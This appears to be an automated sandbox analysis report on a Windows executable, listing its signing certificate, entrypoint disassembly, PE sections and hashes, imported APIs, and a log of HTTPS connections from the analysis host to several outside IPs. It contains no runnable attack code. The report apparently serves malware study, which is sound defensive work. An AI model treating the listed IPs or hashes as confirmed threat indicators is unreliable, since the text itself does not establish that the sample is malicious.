Not Before, Not After	19/08/2024 11:12:56 19/08/2025 11:12:56
Subject Chain	C=US, S=Washington, L=Redmond, OU=Microsoft Corporation, O=Microsoft Corporation, CN=Microsoft Code Signing PCA 2011
Version:	3
Thumbprint MD5:	DA207C3C0265007E4608E443B592097F
Thumbprint SHA-1:	D25327B22C51D559A9831549AD7DED5720CBBFF4
Thumbprint SHA-256:	FA3C112FFC2A6252F825D426B4F66D7CAA58828660ABFF304320D7C0B53C908A
Serial:	00968F27650BEB8FEA06105C962F8ED5FF

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007EFFD8845550h
dec eax
add esp, 28h
jmp 00007EFFD8844D27h
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
jmp 00007EFFD8844EC1h
dec eax
mov ecx, ebx
call 00007EFFD884C6A9h
test eax, eax
je 00007EFFD8844EC5h
dec eax
mov ecx, ebx
call 00007EFFD8844BD9h
dec eax
test eax, eax
je 00007EFFD8844E99h
dec eax
add esp, 20h
pop ebx
ret
dec eax
cmp ebx, FFFFFFFFh
je 00007EFFD8844EB8h
call 00007EFFD88459E0h
int3
call 00007EFFD88459FAh
int3
jmp 00007EFFD8845A28h
int3
int3
int3
jmp 00007EFFD8844F70h
int3
int3
int3
dec eax
sub esp, 28h
dec ebp
mov eax, dword ptr [ecx+38h]
dec eax
mov ecx, edx
dec ecx
mov edx, ecx
call 00007EFFD8844EC2h
mov eax, 00000001h
dec eax
add esp, 28h
ret
int3
int3
int3
inc eax
push ebx
inc ebp
mov ebx, dword ptr [eax]
dec eax
mov ebx, edx
inc ecx
and ebx, FFFFFFF8h
dec esp
mov ecx, ecx
inc ecx
test byte ptr [eax], 00000004h
dec esp
mov edx, ecx
je 00007EFFD8844EC5h
inc ecx
mov eax, dword ptr [eax+08h]
dec ebp
arpl word ptr [eax+04h], dx
neg eax
dec esp
add edx, ecx
dec eax
arpl ax, cx
dec esp
and edx, ecx
dec ecx
arpl bx, ax
dec edx
mov edx, dword ptr [eax+edx]
dec eax
mov eax, dword ptr [ebx+10h]
mov ecx, dword ptr [eax+08h]
dec eax
mov eax, dword ptr [ebx+08h]
test byte ptr [ecx+eax+03h], 0000000Fh
je 00007EFFD8844EBDh
movzx eax, byte ptr [ecx+eax+00h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x2758c0	0x58	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x275918	0xdc	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x29c000	0x30d8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x287000	0x14184	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x229600	0x1e60	.rdata
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2a0000	0x644	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x245b50	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x245d80	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x245a10	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1a7000	0x720	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x71118	0x71200	221be7d0d5e39d3111e3d0b536f5c1b1	False	0.45581837016574583	data	6.6344996472311655	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.managed	0x73000	0xcdcb8	0xcde00	f2c67f30e7bd4b40e8e8b5cdbc8f569d	False	0.4515252637370977	data	6.4553137792934425	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
hydrated	0x141000	0x654a8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x1a7000	0xd02e8	0xd0400	7fe464085761d81d9536a63863244125	False	0.46597740658763503	data	6.845918928994816	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x278000	0xef60	0x2200	c83211c0218d8881d0c007763f391523	False	0.24597886029411764	data	3.7951751618344374	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x287000	0x14184	0x14200	a5f56b90e4030d137ca80e06e1a867ef	False	0.48904551630434784	data	6.174251542452601	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x29c000	0x30d8	0x3200	a04f95fd005e5672b1d099ece726e0a4	False	0.9215625	data	7.816666284493657	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2a0000	0x644	0x800	6821114138d3e1df6a6164ef24df1791	False	0.43798828125	data	4.683627888014547	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
BINARY	0x29c134	0x2aa4	data	1.00100769512642
RT_VERSION	0x29ebd8	0x314	data	0.39847715736040606
RT_MANIFEST	0x29eeec	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegEnumValueW, RegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, RegDeleteKeyExW, RegDeleteValueW, RegEnumKeyExW, RegFlushKey, RegQueryInfoKeyW, RegSetValueExW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, CreateWellKnownSid, GetWindowsAccountDomainSid, RevertToSelf, OpenThreadToken, SetThreadToken, DuplicateTokenEx, GetSecurityDescriptorLength, EventWrite, EventRegister, EventEnabled
bcrypt.dll	BCryptDestroyKey, BCryptGenerateSymmetricKey, BCryptOpenAlgorithmProvider, BCryptGenRandom, BCryptCloseAlgorithmProvider
KERNEL32.dll	TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, EncodePointer, CloseThreadpoolIo, GetCurrentProcessId, MultiByteToWideChar, GetStdHandle, GetCalendarInfoEx, CompareStringOrdinal, CompareStringEx, FindNLSStringEx, GetLocaleInfoEx, ResolveLocaleName, FindStringOrdinal, GetTickCount64, GetCurrentProcess, GetCurrentThread, Sleep, InitializeCriticalSection, InitializeConditionVariable, DeleteCriticalSection, LocalFree, EnterCriticalSection, SleepConditionVariableCS, LeaveCriticalSection, WakeConditionVariable, QueryPerformanceCounter, WaitForMultipleObjectsEx, GetLastError, QueryPerformanceFrequency, SetLastError, GetFullPathNameW, GetLongPathNameW, LocalAlloc, GetConsoleOutputCP, WideCharToMultiByte, GetProcAddress, RaiseFailFastException, CreateThreadpoolIo, StartThreadpoolIo, CancelThreadpoolIo, LocaleNameToLCID, LCMapStringEx, EnumTimeFormatsEx, EnumCalendarInfoExEx, CreateFileW, DeleteFileW, DeviceIoControl, ExpandEnvironmentStringsW, FindClose, FindFirstFileExW, FlushFileBuffers, FreeLibrary, GetFileAttributesExW, GetFileInformationByHandleEx, GetFileType, GetModuleFileNameW, GetOverlappedResult, LoadLibraryExW, ReadFile, SetFileInformationByHandle, SetThreadErrorMode, WriteFile, GetCurrentProcessorNumberEx, CloseHandle, SetEvent, ResetEvent, CreateEventExW, GetEnvironmentVariableW, FormatMessageW, DuplicateHandle, GetThreadPriority, SetThreadPriority, GetConsoleWindow, FreeConsole, AllocConsole, CreateProcessW, GetThreadContext, ExitProcess, K32EnumProcessModulesEx, IsWow64Process, GetExitCodeProcess, OpenProcess, K32EnumProcesses, K32GetModuleInformation, K32GetModuleBaseNameW, K32GetModuleFileNameExW, GetProcessId, FlushProcessWriteBuffers, GetCurrentThreadId, WaitForSingleObjectEx, VirtualQuery, RtlRestoreContext, AddVectoredExceptionHandler, FlsAlloc, FlsGetValue, FlsSetValue, CreateEventW, TerminateProcess, SwitchToThread, CreateThread, SuspendThread, ResumeThread, SetThreadContext, FlushInstructionCache, VirtualAlloc, VirtualProtect, VirtualFree, QueryInformationJobObject, GetModuleHandleW, GetModuleHandleExW, GetProcessAffinityMask, InitializeContext, GetEnabledXStateFeatures, SetXStateFeaturesMask, InitializeCriticalSectionEx, GetSystemTimeAsFileTime, DebugBreak, WaitForSingleObject, SleepEx, GlobalMemoryStatusEx, GetSystemInfo, GetLogicalProcessorInformation, GetLogicalProcessorInformationEx, GetLargePageMinimum, VirtualUnlock, VirtualAllocExNuma, IsProcessInJob, GetNumaHighestNodeNumber, GetProcessGroupAffinity, K32GetProcessMemoryInfo, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, InitializeSListHead
ole32.dll	CoGetApartmentType, CoUninitialize, CoInitializeEx, CoCreateGuid, CoWaitForMultipleHandles
api-ms-win-crt-math-l1-1-0.dll	ceil, __setusermatherr
api-ms-win-crt-heap-l1-1-0.dll	free, _callnewh, calloc, _set_new_mode, malloc
api-ms-win-crt-string-l1-1-0.dll	_stricmp, strcpy_s, strcmp, _wcsicmp, wcsncmp, strncpy_s
api-ms-win-crt-runtime-l1-1-0.dll	__p___wargv, _cexit, exit, terminate, _crt_atexit, _register_onexit_function, _initialize_onexit_table, __p___argc, _exit, abort, _initterm_e, _c_exit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _set_app_type, _initterm, _configure_wide_argv, _initialize_wide_environment, _get_initial_wide_environment
api-ms-win-crt-stdio-l1-1-0.dll	__stdio_common_vsprintf_s, __stdio_common_vfprintf, __p__commode, _set_fmode, __stdio_common_vsscanf, __acrt_iob_func
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 16, 2024 21:20:03.304239988 CEST	49674	443	192.168.2.6	173.222.162.64
Sep 16, 2024 21:20:03.304239988 CEST	49673	443	192.168.2.6	173.222.162.64
Sep 16, 2024 21:20:03.632356882 CEST	49672	443	192.168.2.6	173.222.162.64
Sep 16, 2024 21:20:09.548367977 CEST	49713	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:09.548396111 CEST	443	49713	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:09.548460007 CEST	49713	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:09.560796976 CEST	49713	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:09.560813904 CEST	443	49713	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:10.026403904 CEST	443	49713	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:10.030174017 CEST	49713	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:10.032916069 CEST	49713	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:10.032937050 CEST	443	49713	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:10.033348083 CEST	443	49713	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:10.080871105 CEST	49713	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:10.103212118 CEST	49713	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:10.147403002 CEST	443	49713	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:10.210706949 CEST	443	49713	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:10.210832119 CEST	443	49713	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:10.210871935 CEST	443	49713	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:10.210951090 CEST	443	49713	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:10.211007118 CEST	49713	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:10.211023092 CEST	443	49713	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:10.211096048 CEST	443	49713	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:10.212325096 CEST	49713	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:10.243455887 CEST	49713	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:10.670444965 CEST	49716	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:10.670488119 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:10.670566082 CEST	49716	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:10.670928955 CEST	49716	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:10.670938969 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:11.144308090 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:11.148144960 CEST	49716	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:11.149579048 CEST	49716	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:11.149589062 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:11.149983883 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:11.151315928 CEST	49716	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:11.195400000 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:11.615710020 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:11.615755081 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:11.615787983 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:11.615870953 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:11.615906954 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:11.615931988 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:11.616031885 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:11.623402119 CEST	443	49716	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:11.627758026 CEST	49716	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:11.633960009 CEST	49716	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:12.922230959 CEST	49673	443	192.168.2.6	173.222.162.64
Sep 16, 2024 21:20:12.980591059 CEST	49674	443	192.168.2.6	173.222.162.64
Sep 16, 2024 21:20:13.281456947 CEST	49672	443	192.168.2.6	173.222.162.64
Sep 16, 2024 21:20:15.325397015 CEST	443	49707	173.222.162.64	192.168.2.6
Sep 16, 2024 21:20:15.325794935 CEST	49707	443	192.168.2.6	173.222.162.64
Sep 16, 2024 21:20:15.643717051 CEST	49719	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:15.643765926 CEST	443	49719	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:15.643868923 CEST	49719	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:15.644100904 CEST	49719	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:15.644114017 CEST	443	49719	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:16.307094097 CEST	443	49719	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:16.308583975 CEST	49719	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:16.308614016 CEST	443	49719	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:16.429352045 CEST	443	49719	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:16.429393053 CEST	443	49719	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:16.429533958 CEST	49719	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:16.429555893 CEST	443	49719	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:16.434161901 CEST	443	49719	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:16.434259892 CEST	443	49719	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:16.434267044 CEST	49719	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:16.434329033 CEST	49719	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:16.434637070 CEST	49719	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:16.502985001 CEST	49722	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:16.503078938 CEST	443	49722	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:16.503176928 CEST	49722	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:16.503422976 CEST	49722	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:16.503456116 CEST	443	49722	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:17.862747908 CEST	443	49722	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:17.864034891 CEST	49722	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:17.864099026 CEST	443	49722	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:18.407274008 CEST	443	49722	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:18.407310009 CEST	443	49722	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:18.407541990 CEST	49722	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:18.407622099 CEST	443	49722	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:18.408799887 CEST	443	49722	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:18.408868074 CEST	49722	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:18.408885002 CEST	443	49722	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:18.412178993 CEST	443	49722	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:18.412197113 CEST	443	49722	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:18.412234068 CEST	49722	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:18.412251949 CEST	443	49722	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:18.412286997 CEST	443	49722	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:18.412626028 CEST	49722	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:18.412626028 CEST	49722	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:21.612185001 CEST	49723	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:21.612247944 CEST	443	49723	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:21.620429993 CEST	49723	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:21.620701075 CEST	49723	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:21.620721102 CEST	443	49723	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:22.081242085 CEST	443	49723	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:22.082859039 CEST	49723	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:22.082882881 CEST	443	49723	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:22.218628883 CEST	443	49723	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:22.218663931 CEST	443	49723	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:22.218832970 CEST	49723	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:22.218862057 CEST	443	49723	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:22.220230103 CEST	443	49723	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:22.220316887 CEST	443	49723	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:22.220346928 CEST	49723	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:22.220501900 CEST	49723	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:22.220890999 CEST	49723	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:22.271224976 CEST	49724	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:22.271270037 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:22.271400928 CEST	49724	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:22.271600008 CEST	49724	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:22.271615028 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:22.750114918 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:22.785280943 CEST	49724	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:22.785296917 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:22.985330105 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:22.986373901 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:22.986464024 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:22.988176107 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:22.988214016 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:22.989919901 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:22.990031958 CEST	443	49724	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:22.990302086 CEST	49724	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:22.991157055 CEST	49724	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:22.991530895 CEST	49724	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:27.383451939 CEST	49729	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:27.383550882 CEST	443	49729	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:27.383666992 CEST	49729	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:27.384076118 CEST	49729	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:27.384110928 CEST	443	49729	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:27.988682985 CEST	443	49729	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:28.002747059 CEST	49729	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:28.002819061 CEST	443	49729	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:28.126045942 CEST	443	49729	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:28.126560926 CEST	443	49729	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:28.126588106 CEST	443	49729	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:28.126610041 CEST	443	49729	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:28.126648903 CEST	49729	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:28.126708031 CEST	443	49729	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:28.126735926 CEST	443	49729	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:28.126739979 CEST	49729	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:28.126787901 CEST	49729	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:28.127563000 CEST	49729	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:28.405404091 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:28.405483007 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:28.405575991 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:28.406282902 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:28.406300068 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:28.870647907 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:28.883280993 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:28.883323908 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:29.091238022 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:29.091272116 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:29.091329098 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:29.091363907 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:29.091955900 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:29.092010021 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:29.092021942 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:29.092777014 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:29.092798948 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:29.092828989 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:29.092838049 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:29.092870951 CEST	443	49730	188.114.97.3	192.168.2.6
Sep 16, 2024 21:20:29.092878103 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:29.092916965 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:29.093519926 CEST	49730	443	192.168.2.6	188.114.97.3
Sep 16, 2024 21:20:33.422610044 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:33.422636986 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:33.422715902 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:33.423053026 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:33.423064947 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:33.905535936 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:33.905627966 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:33.907494068 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:33.907504082 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:33.907763958 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:33.909074068 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:33.951414108 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.032653093 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.033021927 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.033083916 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:34.033097982 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.034280062 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.034322023 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.034337044 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:34.034346104 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.034406900 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:34.035132885 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.035932064 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.035962105 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.036005020 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:34.036015034 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.036058903 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:34.037461042 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.084599018 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:34.084613085 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.123800993 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.123835087 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.123934031 CEST	443	49732	104.21.76.57	192.168.2.6
Sep 16, 2024 21:20:34.124054909 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:34.124054909 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:34.169162035 CEST	49732	443	192.168.2.6	104.21.76.57
Sep 16, 2024 21:20:34.292592049 CEST	49733	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:34.292645931 CEST	443	49733	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:34.292718887 CEST	49733	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:34.293593884 CEST	49733	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:34.293608904 CEST	443	49733	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:34.750214100 CEST	443	49733	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:34.780227900 CEST	49733	443	192.168.2.6	104.20.4.235
Sep 16, 2024 21:20:34.780252934 CEST	443	49733	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:34.883852005 CEST	443	49733	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:34.884295940 CEST	443	49733	104.20.4.235	192.168.2.6
Sep 16, 2024 21:20:34.884335041 CEST	443	49733	104.20.4.235	192.168.2.6
